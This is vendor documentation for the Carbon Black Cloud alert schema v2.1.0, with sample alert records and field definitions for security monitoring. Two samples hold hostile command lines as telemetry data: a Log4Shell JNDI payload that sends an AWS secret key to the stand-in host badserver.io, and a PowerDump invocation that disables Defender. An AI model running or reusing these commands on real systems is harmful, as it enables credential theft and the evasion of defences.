Alert Schema 2.1.0


Introduction

The following tables list the fields that can be included in an alert record for each alert type generated by the Carbon Black Cloud.

This Data Forwarder Schema (v2.1.0) is aligned with the Alerts v7 API schema.

Fields in the Schema section are included with most alert types and the exceptions are annotated.

Alert types that are emitted from the Data Forwarder are dependent on the features you have enabled in Carbon Black Cloud. Possible Alert types are:

  • CB_ANALYTICS - created from the Endpoint Standard NGAV offering.
  • CONTAINER_RUNTIME - created from the Container Security offering. Deprecated as of May 2025. For more info here.
  • DEVICE_CONTROL - created when an endpoint attempts to access a blocked USB device.
  • HOST_BASED_FIREWALL - created from network detections in the Endpoint Standard Host-Based Firewall add-on.
  • INTRUSION_DETECTION_SYSTEM - created by the XDR extension to Enterprise EDR.
  • WATCHLIST - created from alert enabled watchlists in Enterprise EDR.
Note: For fields where the Alert Types Supported column contains no entries, this means this field is available only to MDR customers.

Alert Type Examples

    {
        "org_key":"ABCD1234",
        "alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
        "id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
        "type":"INTRUSION_DETECTION_SYSTEM",
        "backend_timestamp":"2023-02-03T17:27:33.007Z",
        "backend_update_timestamp":"2023-02-03T17:27:33.007Z",
        "detection_timestamp":"2023-02-03T17:22:03.945Z",
        "first_event_timestamp":"2023-02-03T17:22:03.945Z",
        "last_event_timestamp":"2023-02-03T17:22:03.945Z",
        "severity":1,
        "reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
        "reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
        "threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
        "primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow": {
             "change_timestamp":"2023-02-03T17:27:33.007Z",
             "changed_by_type":"SYSTEM",
             "changed_by":"ALERT_CREATION",
             "closure_reason":"NO_REASON",
             "status":"OPEN"
         },
        "determination":{"change_timestamp":"2023-02-03T17:27:33.007Z",
        "value":"NONE",
        "changed_by_type":"SYSTEM",
        "changed_by":"ALERT_CREATION"},
        "alert_notes_present":false,
        "is_updated":false,
        "rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
        "rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
        "device_id":17482451,
        "device_name":"DEV01-39X-1",
        "device_uem_id":"",
        "device_target_value":"MEDIUM",
        "device_policy":"Standard",
        "device_policy_id":165700,
        "device_os":"WINDOWS",
        "device_os_version":"Windows 10 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"66.170.99.2",
        "device_internal_ip":"10.203.105.21",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "ttps":[],
        "attack_tactic":"TA0001",
        "attack_technique":"T1190",
        "process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
        "process_pid":5780,
        "process_name":"c:\\windows\\system32\\curl.exe",
        "process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
        "process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"curl  -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
        "process_username":"DEV01-39X-1\\bit9qa",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
        "parent_pid":8796,
        "parent_name":"c:\\windows\\system32\\cmd.exe",
        "parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
        "parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
        "parent_username":"DEV01-39X-1\\bit9qa",
        "childproc_guid":"",
        "childproc_username":"",
        "childproc_cmdline":"",
        "netconn_remote_port":80,
        "netconn_local_port":49233,
        "netconn_protocol":"",
        "netconn_remote_domain":"google.com",
        "netconn_remote_ip":"142.250.189.174",
        "netconn_local_ip":"10.203.105.21",
        "netconn_remote_ipv4":"142.250.189.174",
        "netconn_local_ipv4":"10.203.105.21",
        "tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
        "threat_name":"CVE-2021-44228 Exploit",
        "version":"2.1.0"
    }
    
    {
        "org_key":"ABCD1234",
        "alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f",
        "id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
        "type":"CONTAINER_RUNTIME",
        "is_updated":false,
        "detection_timestamp":"2023-02-06T00:10:51.176Z",
        "first_event_timestamp":"2023-02-06T00:09:19.320Z",
        "last_event_timestamp":"2023-02-06T00:09:19.320Z",
        "severity":5,
        "reason":"Detected a connection to a public destination that isn't allowed for this scope",
        "threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
        "primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
        "workflow":{
            "status":"OPEN",
            "change_timestamp":"2023-02-06T00:13:37.663Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON"
        },
        "alert_notes_present":false,
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
        "sensor_action":"ALLOW",
        "device_target_value":"MEDIUM",
        "device_os":"WINDOWS",
        "device_location":"UNKNOWN",
        "k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7",
        "k8s_policy":"Big runtime policy",
        "k8s_rule_id":"11111111-1111-1111-1111-111111111111",
        "k8s_rule":"Allowed public destinations",
        "k8s_cluster":"tomer:sensor-aks",
        "k8s_namespace":"kube-system",
        "k8s_kind":"DaemonSet",
        "k8s_workload_name":"ama-logs",
        "k8s_pod_name":"ama-logs-gm5tt",
        "connection_type":"EGRESS",
        "ip_reputation":96,
        "netconn_remote_port":443,
        "netconn_local_port":56618,
        "netconn_protocol":"TCP",
        "netconn_remote_domain":"westeurope.monitoring.azure.com",
        "netconn_remote_ip":"20.50.65.82",
        "netconn_local_ip":"10.244.2.22",
        "netconn_remote_ipv4":"20.50.65.82",
        "netconn_local_ipv4":"10.244.2.22",
        "remote_is_private":false,
        "process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33",
        "process_pid":2100834,
        "process_name":"KUBERNETES_RUNTIME_NODE_AGENT",
        "process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5",
        "process_md5":"4cbdc5f51d0397b26886191b799131d5",
        "process_reputation":"NOT_LISTED",
        "process_effective_reputation":"RESOLVING",
        "mdr_alert_notes_present":false,
        "mdr_alert":false,
        "version":"2.1.0"
    }
    
    {
        "org_key":"ABCD1234",
        "alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
        "id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
        "type":"WATCHLIST",
        "is_updated":false,
        "detection_timestamp":"2023-07-17T17:21:13.483Z",
        "backend_timestamp":"2023-07-17T17:21:34.063Z",
        "backend_update_timestamp":"2023-07-17T17:21:34.063Z",
        "first_event_timestamp":"2023-07-17T17:19:00.412Z",
        "last_event_timestamp":"2023-07-17T17:19:00.412Z",
        "severity":10,
        "reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
        "threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
        "primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
        "workflow":{
            "status":"OPEN",
            "change_timestamp":"2023-07-17T17:21:34.063Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON"
        },
        "determination":{
            "value":"NONE",
            "change_timestamp":"2023-07-17T17:21:34.063Z"
        },
        "alert_notes_present":false,
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
        "sensor_action":"ALLOW",
        "device_target_value":"MEDIUM",
        "device_policy_id":6525,
        "device_policy":"default",
        "device_id":5890528,
        "device_name":"ABT102675",
        "device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
        "device_os":"WINDOWS",
        "device_os_version":"Windows 11 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"49.206.61.4",
        "device_internal_ip":"192.168.0.104",
        "report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
        "report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
        "report_tags":[
            "credentialaccess",
            "t1558",
            "windows",
            "amsi",
            "attack",
            "attackframework"
        ],
        "report_link":"https://attack.mitre.org/techniques/T1558/003/",
        "ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
        "watchlists":[{
            "id":"Ci7w5B4URg6HN60hatQMQ",
            "name":"AMSI Threat Intelligence"
            }],
        "process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
        "process_pid":13636,
        "process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
        "process_md5":"0499440c4b0783266183246e384c6657",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
        "process_username":"NT AUTHORITY\\SYSTEM",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
        "parent_pid":10384,
        "parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
        "parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
        "parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
        "parent_reputation":"NOT_LISTED",
        "parent_effective_reputation":"NOT_LISTED",
        "parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
        "parent_username":"NT AUTHORITY\\SYSTEM",
        "mdr_alert_notes_present":false,
        "mdr_alert":false,
        "ml_classification_final_verdict":"ANOMALOUS",
        "ml_classification_global_prevalence":"MEDIUM",
        "ml_classification_org_prevalence":"LOW",
        "version":"2.1.0"
    }
    
    {
        "org_key":"ABCD1234",
        "alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
        "id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
        "type":"CB_ANALYTICS",
        "is_updated":true,
        "detection_timestamp":"2023-07-17T17:15:51.708Z",
        "backend_timestamp":"2023-07-17T17:16:50.960Z",
        "backend_update_timestamp":"2023-07-17T17:18:03.397Z",
        "first_event_timestamp":"2023-07-17T17:15:33.396Z",
        "last_event_timestamp":"2023-07-17T17:15:33.396Z",
        "severity":5,
        "reason":"A known virus (HackTool: Powerpuff) was detected running.",
        "threat_id":"9e0afc389c1acc43b382b1ba590498d2",
        "primary_event_id":"94953e4524c511ee86284f0541a5184d",
        "workflow":{
            "status":"OPEN",
            "change_timestamp":"2023-07-17T17:16:50.960Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON"
        },
        "determination":{
            "value":"NONE",
            "change_timestamp":"2023-07-17T17:16:50.960Z"
        },
        "alert_notes_present":false,
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "reason_code":"T_REP_VIRUS",
        "sensor_action":"ALLOW",
        "device_target_value":"MISSION_CRITICAL",
        "device_policy_id":112221,
        "device_policy":"SSQ_Policy",
        "device_id":6948863,
        "device_name":"Kognos-W19-CB-3",
        "device_os":"WINDOWS",
        "device_os_version":"Windows Server 2019 x64",
        "device_username":"demouser@demo.org",
        "device_location":"OFFSITE",
        "device_external_ip":"34.234.170.45",
        "device_internal_ip":"10.0.14.120",
        "ttps":[
            "FILELESS",
            "MALWARE_APP",
            "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
            "MITRE_T1059_001_POWERSHELL",
            "RUN_MALWARE_APP"
        ],
        "attack_tactic":"TA0002",
        "process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
        "process_pid":3600,
        "process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
        "process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
        "process_md5":"42a80cc2333b612b63a859f17474c9af",
        "process_reputation":"KNOWN_MALWARE",
        "process_effective_reputation":"KNOWN_MALWARE",
        "process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
        "process_username":"KOGNOS-W19-CB-3\\Administrator",
        "parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
        "parent_pid":4024,
        "parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_username":"KOGNOS-W19-CB-3\\Administrator",
        "childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
        "childproc_effective_reputation":"RESOLVING",
        "childproc_username":"KOGNOS-W19-CB-3\\Administrator",
        "blocked_effective_reputation":"RESOLVING",
        "mdr_alert_notes_present":false,
        "mdr_alert":false,
        "version":"2.1.0",
    }
    
    {
      "org_key": "ABCD1234",
      "alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:94992bd4-b072-3158-aa7b-36bea9f54e15&orgKey=ABCD1234",
      "id": "94992bd4-b072-3158-aa7b-36bea9f54e15",
      "type": "HOST_BASED_FIREWALL",
      "backend_timestamp": "2025-04-02T08:08:43.716Z",
      "backend_update_timestamp": "2025-04-02T08:08:43.716Z",
      "detection_timestamp": "2025-04-02T08:07:18.070Z",
      "first_event_timestamp": "2025-04-02T08:07:18.070Z",
      "last_event_timestamp": "2025-04-02T08:07:18.070Z",
      "severity": 4,
      "reason": "Inbound UDP connection blocked by firewall rule group block ftp",
      "reason_code": "DD71F364-4A8C-4B14-89F6-7041CC6BEDEA:CE7A4C0E-0F7D-449B-B816-615C66AEB91D",
      "threat_id": "353f695cedb2ce00703618f9af2454412f09ed88163fd645a72bcf4f0d1eac05",
      "primary_event_id": "9aN-VbSURHe63RCttnuTYw-0",
      "policy_applied": "APPLIED",
      "run_state": "DID_NOT_RUN",
      "sensor_action": "DENY",
      "workflow": {
        "change_timestamp": "2025-04-02T08:08:43.716Z",
        "changed_by_type": "SYSTEM",
        "changed_by": "ALERT_CREATION",
        "closure_reason": "NO_REASON",
        "status": "OPEN"
      },
      "determination": {
        "change_timestamp": "2025-04-02T08:08:43.716Z",
        "value": "NONE",
        "changed_by_type": "SYSTEM",
        "changed_by": "ALERT_CREATION"
      },
      "alert_notes_present": false,
      "alert_origin": "ALERT_ORIGIN_UNKNOWN",
      "is_updated": false,
      "rule_category_id": "DD71F364-4A8C-4B14-89F6-7041CC6BEDEA",
      "rule_id": "CE7A4C0E-0F7D-449B-B816-615C66AEB91D",
      "device_id": 18118170,
      "device_name": "device-name.3663511-23",
      "device_target_value": "MEDIUM",
      "device_policy": "Raz-test",
      "device_policy_id": 20314731,
      "device_os": "WINDOWS",
      "device_os_version": "Windows 10 x64 SP: 1",
      "device_username": "device-name.3663511-23@carbonblack.com",
      "device_location": "UNKNOWN",
      "device_external_ip": "34.145.18.128",
      "mdr_alert": false,
      "mdr_alert_notes_present": false,
      "process_guid": "ABCD1234-0114761a-001a8553-00000000-1dba3a640911966",
      "process_pid": 1738067,
      "process_name": "SYSTEM",
      "process_sha256": "644d15ea6a0cb7ac2014c15187306ebf790e936c86a94dd87754e2a9622c64a7",
      "process_md5": "3dcc07415880c8378edcc9c799df99da",
      "process_effective_reputation": "LOCAL_WHITE",
      "process_reputation": "NOT_LISTED",
      "process_username": "NT AUTHORITY\\SYSTEM",
      "netconn_remote_port": 138,
      "netconn_local_port": 138,
      "netconn_remote_ip": "10.203.109.77",
      "netconn_local_ip": "10.203.111.255",
      "netconn_remote_ipv4": "10.203.109.77",
      "netconn_local_ipv4": "10.203.111.255",
      "version": "2.1.0"
    }
    
    {
      "org_key": "ABCD1234",
      "alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:a90debb9-788b-4268-8926-1412c45bae19&orgKey=ABCD1234",
      "id": "a90debb9-788b-4268-8926-1412c45bae19",
      "type": "DEVICE_CONTROL",
      "backend_timestamp": "2025-04-02T08:08:24.157Z",
      "backend_update_timestamp": "2025-04-02T08:08:24.157Z",
      "detection_timestamp": "2025-04-02T08:07:18.188Z",
      "first_event_timestamp": "2025-04-02T08:07:18.188Z",
      "last_event_timestamp": "2025-04-02T08:07:18.188Z",
      "severity": 3,
      "reason": "Access attempted on unapproved USB device Lexar USB Flash Drive USB Device (SN: I891EGANR1ZYKDID). A Deny Policy Action was applied.",
      "reason_code": "6D578342-9DE5-4353-9C25-1D3D857BFC5B:DCAEB1FA-513C-4026-9AB6-37A935873FBC",
      "threat_id": "111546d4945db64c849f3aac5b4b62740f7c4d8f537fcd85cafd3b53c8e4d3ea",
      "primary_event_id": "5b9dkxhuQ0anNHtDea77Sg-0",
      "policy_applied": "APPLIED",
      "run_state": "DID_NOT_RUN",
      "sensor_action": "DENY",
      "workflow": {
        "change_timestamp": "2025-04-02T08:08:24.157Z",
        "changed_by_type": "SYSTEM",
        "changed_by": "ALERT_CREATION",
        "closure_reason": "NO_REASON",
        "status": "OPEN"
      },
      "determination": {
        "change_timestamp": "2025-04-02T08:08:24.157Z",
        "value": "NONE",
        "changed_by_type": "SYSTEM",
        "changed_by": "ALERT_CREATION"
      },
      "alert_notes_present": false,
      "alert_origin": "ALERT_ORIGIN_UNKNOWN",
      "is_updated": false,
      "device_id": 18118172,
      "device_name": "device-name-1677785023.154724-39",
      "device_target_value": "MEDIUM",
      "device_policy": "Raz-test",
      "device_policy_id": 20314731,
      "device_os": "WINDOWS",
      "device_os_version": "Windows 10 x64 SP: 1",
      "device_username": "device-name-1677785023.154724-39@carbonblack.com",
      "device_location": "UNKNOWN",
      "device_external_ip": "34.145.18.128",
      "mdr_alert": false,
      "mdr_alert_notes_present": false,
      "vendor_name": "Lexar",
      "vendor_id": "0x05DC",
      "product_name": "USB Flash Drive",
      "product_id": "0x56A2D",
      "external_device_friendly_name": "Lexar USB Flash Drive USB Device",
      "serial_number": "I891EGANR1ZYKDID",
      "version": "2.1.0"
    }
    

New fields

New fields introduced since the previous schema version are denoted with a tangerine bar v2.1.0 at the left of the table row. You can easily isolate these by typing 2.1.0 in the Field Name filter box.

Data Types

Find more detail on the data types here.

Schema

Note: Certain fields that were previously included in this listing, but which never have and never will appear in Data Forwarder output, have been removed.
Field Name Definition Datatype Alert Types Supported
alert_notes_present True if notes are present on the alert ID. False if notes are not present. Boolean CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
V2.1.0 alert_origin How the alert was created.
Possible values:
MDR
MDR_THREAT_HUNT
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
alert_url Link to the alerts page for this alert. Does not vary by alert type String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
attack_tactic A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access String CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM
attack_technique A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access String CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM
backend_timestamp Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. ISO 8601 UTC timestamp CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
backend_update_timestamp Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page.
Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp
ISO 8601 UTC timestamp CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_effective_reputation Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred
Possible values:
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_md5 MD5 hash of the child process binary; for any process terminated by the sensor String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_name Tokenized file path of the files blocked by sensor action String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_sha256 SHA-256 hash of the child process binary; for any process terminated by the sensor String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_cmdline Command line for the child process String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_effective_reputation Effective reputation of the child process; applied by the sensor at the time the event occurred
Possible values:
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_guid Unique process identifier assigned to the child process String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_md5 Hash of the child process' binary (Enterprise EDR) String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_name Filesystem path of the child process' binary String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_sha256 Hash of the child process' binary (Endpoint Standard) String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_username User context in which the child process was executed String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
connection_type
DEPRECATED
Connection Type
INTERNAL_INBOUND
INTERNAL_OUTBOUND
INGRESS
EGRESS
String CONTAINER_RUNTIME
detection_timestamp Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. ISO 8601 UTC timestamp CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
determination User-updatable determination of the alert
{
  "determination": {
    "change_timestamp": "<string>",
    "changed_by": "<string>",
    "changed_by_type": "<string>",
    "value": "<string>"
  }
}
Object CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_external_ip IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_id ID of devices Integer CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_internal_ip IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_location Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix
Possible values:
ONSITE
OFFSITE
UNKNOWN
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_name Device name String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_os Device Operating Systems
WINDOWS
MAC
LINUX
OTHER
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_os_version The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later. String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_policy Device policy String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_policy_id Device policy id Integer CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_target_value Target value assigned to the device, set from the policy
LOW
MEDIUM
HIGH
MISSION_CRITICAL
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_uem_id Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_username Users or device owners of alerts String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
egress_group_id
DEPRECATED
Unique identifier for the egress group String CONTAINER_RUNTIME
egress_group_name
DEPRECATED
Name of the egress group String CONTAINER_RUNTIME
external_device_friendly_name Human-readable external device names String DEVICE_CONTROL
first_event_timestamp Timestamp when the first event in the alert occurred ISO 8601 UTC timestamp CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
id Unique ID of alert String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
ioc_field The field the indicator of comprise (IOC) hit contains String WATCHLIST
ioc_hit IOC field value or IOC query that matches String WATCHLIST
ioc_id Unique identifier of the IOC that generated the watchlist hit String WATCHLIST
ip_reputation
DEPRECATED
Range of reputations to accept for the remote IP:
0: unknown
1-20: high risk
21-40: suspicious
41-60: moderate
61-80: low risk
81-100: trustworthy

There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive)
Integer CONTAINER_RUNTIME
